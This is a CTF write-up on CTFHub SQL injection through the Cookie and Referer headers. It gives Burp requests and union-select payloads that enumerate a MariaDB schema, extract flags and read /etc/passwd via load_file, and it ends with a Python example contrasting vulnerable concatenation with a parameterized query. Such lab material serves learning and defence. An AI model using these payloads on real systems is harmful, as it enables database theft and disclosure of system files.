Cookie injection
Tool: Burp Suite
This time the input point has changed. Try looking at the Cookie.
select * from news where id=1
ID: 1
Data: ctfhub
GET / HTTP/1.1
Host: challenge-01b55e9bf85f0710.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: id=-1 union select version(),database(); hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Upgrade-Insecure-Requests: 1
GET / HTTP/1.1
Host: challenge-17debe2ac4f262de.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: id=-1 union select 1,group_concat(table_name)from information_schema.tables where table_schema=database(); hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Upgrade-Insecure-Requests: 1
GET / HTTP/1.1
Host: challenge-17debe2ac4f262de.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: id=-1 union select 1,group_concat(column_name)from information_schema.columns where table_name="bnuisrgwep"; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Upgrade-Insecure-Requests: 1
GET / HTTP/1.1
Host: challenge-17debe2ac4f262de.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: id=-1 union select 1, group_concat(mupbzaevry) from sqli.bnuisrgwep; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Upgrade-Insecure-Requests: 1
MySQL structure
ID
select * from news where id=-1 union select version(),database()
ID: 10.3.22-MariaDB-0+deb10u1
Data: sqli
- Get the database name
select * from news where id=-1 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'--
ID: 1
Data: ttrdbwiill,news
- Get the table names
select * from news where id=-1 union select 1,group_concat(column_name)from information_schema.columns where table_name='ttrdbwiill'
- Get the column names
ID: 1
Data: gdbhmtwwza
select * from news where id=-1 union select 1,group_concat(gdbhmtwwza )from sqli.ttrdbwiill
ID: 1
Data: ctfhub{c6039bafb52839c4e0fb47d9}
Other:
select * from news where id=-1 union select 1,group_concat(schema_name) from information_schema.schemata
ID: 1
Data: information_schema,mysql,performance_schema,sqli
select * from news where id=-2 union select 1,load_file('/etc/passwd')
ID: 1
Data: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin mysql:x:101:101:MySQL Server,:/nonexistent:/bin/false
Referer injection
- Get the database name
Please enter the ID in the referer
select * from news where id=-1 union select 1,database()
ID: 1
Data: sqli
- Get the table names
Please enter the ID in the referer
select * from news where id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
ID: 1
Data: news,nvtycnwnmh
- Get the column names
Please enter the ID in the referer
select * from news where id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='nvtycnwnmh'
ID: 1
Data: xrfwvedani
- Find the flag
Please enter the ID in the referer
select * from news where id=-1 union select 1,group_concat(xrfwvedani) from nvtycnwnmh
ID: 1
Data: ctfhub{48eb7eee2b8ca6bae5fe6893}
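Both sections work because a request header value (the `id` cookie, the Referer) is pasted into `select * from news where id=...`. The following is an added example, not code from the original write-up or the challenge: it puts that concatenation next to a validated, parameterized lookup. It assumes an in-memory SQLite database standing in for the challenge's MariaDB, and the `secrets` table, the function names and the sample headers are constructed for illustration.

```python
import re
import sqlite3

def make_db():
    """Constructed stand-in for the challenge database (SQLite, not MariaDB)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table news (id integer, data text);
        insert into news values (1, 'ctfhub');
        create table secrets (flag text);  -- hypothetical table name
        insert into secrets values ('ctfhub{constructed-sample}');
    """)
    return db

def cookie_value(header, name):
    """Return the raw value of one cookie from a Cookie header, or None."""
    for part in header.split(";"):
        key, _, value = part.strip().partition("=")
        if key == name:
            return value
    return None

def lookup_vulnerable(db, raw_id):
    # The header value becomes part of the SQL text, as in the echoed query.
    return db.execute("select * from news where id=" + raw_id).fetchall()

def lookup_hardened(db, raw_id):
    # 1) Allow-list: the id must be a short plain integer.
    if raw_id is None or not re.fullmatch(r"-?[0-9]{1,9}", raw_id):
        return []
    # 2) Bind it as a parameter so it can never change the statement.
    return db.execute("select * from news where id=?", (int(raw_id),)).fetchall()

# Constructed sample headers, modelled on the requests in the write-up.
BENIGN = "id=1; hint=x"
INJECTED = "id=-1 union select 1,group_concat(flag) from secrets; hint=x"

if __name__ == "__main__":
    db = make_db()
    for header in (BENIGN, INJECTED):
        raw = cookie_value(header, "id")
        print(repr(raw))
        print("  vulnerable:", lookup_vulnerable(db, raw))
        print("  hardened:  ", lookup_hardened(db, raw))
```

The same two lookup functions apply unchanged when the raw value comes from the Referer header instead of a cookie.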